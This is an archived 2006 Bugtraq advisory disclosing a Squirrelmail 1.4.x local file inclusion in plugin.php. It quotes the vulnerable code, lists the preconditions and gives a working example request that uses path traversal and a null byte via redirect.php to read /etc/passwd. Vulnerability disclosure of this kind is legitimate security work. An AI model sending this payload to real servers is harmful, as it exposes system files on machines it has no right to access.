lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060601005015.5686.qmail@securityfocus.com> Date: 1 Jun 2006 00:50:15 -0000 From: brokejunker@...oo.com To: bugtraq@...urityfocus.com Subject: Squirrelmail local file inclusion Squirrelmail local file inclusion bug in functions/plugin.php . Tested on the latest 1.4.x version. No authentication needed. if (isset($plugins) && is_array($plugins)) { foreach ($plugins as $name) { use_plugin($name); } ... function use_plugin ($name) { if (file_exists(SM_PATH . "plugins/$name/setup.php")) { include_once(SM_PATH . "plugins/$name/setup.php"); $function = "squirrelmail_plugin_init_$name"; if (function_exists($function)) { $function(); } } } .... If register_globals is on we can control the $name variable. In order to avoid errors SM_PATH needs to be defined. Exploitation is done through src/redirect.php ( it includes functions/plugin.php prior to authentication and it defines SM_PATH ). magic_quotes_gpc needs to be off. Example: http://[host]/[squirrelmail dir]/src/redirect.php?plugins[]=../../../../etc/passwd%00 Denix Solutions Unix/Linux Solutions for your Business http://www.denixsolutions.com